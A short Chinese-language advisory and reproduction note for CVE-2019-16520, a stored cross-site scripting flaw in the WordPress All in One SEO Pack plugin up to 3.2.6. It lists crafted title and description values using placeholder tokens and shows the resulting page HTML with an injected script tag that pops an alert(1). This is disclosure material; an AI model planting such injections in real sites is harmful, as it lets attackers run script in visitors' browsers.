（CVE-2019-16520）WordPress_Plugin_-_All_in_One_SEO_Pack

# （CVE-2019-16520）WordPress Plugin – All in One SEO Pack 储存型xss

==========================

一、漏洞简介
————

适用于WordPress的3.2.7之前的”all-in-one-seo-pack plugin”插件（aka All in
One SEO
Pack）易受存储XSS的影响，原因是该插件通过不安全的占位符替换提供的帖子的SEO特定描述的编码不正确。

二、漏洞影响
————

wordpress \<= 3.2.6 三、复现过程 ------------ ### 1、利用过程创建或编辑帖子时，可以设置以下值来显示漏洞： Title: test_aiosp_title&<>“‘;>a
Description: test_aiosp_desc&<>“‘; pt:%post_title% wp_title:%wp_title% bd:%blog_description% sd:%site_description% bt: %blog_title% st: %site_title% desc:%description%

当帖子被保存并以后访问时，将显示JavaScript警报弹出窗口。生成的HTML页面将包含以下代码

test_aiosp_title&<>"';<script src='data:text/javascript,alert(1)'></script> | XXXXXXX

文章版权归作者所有，未经允许请勿转载。

THE END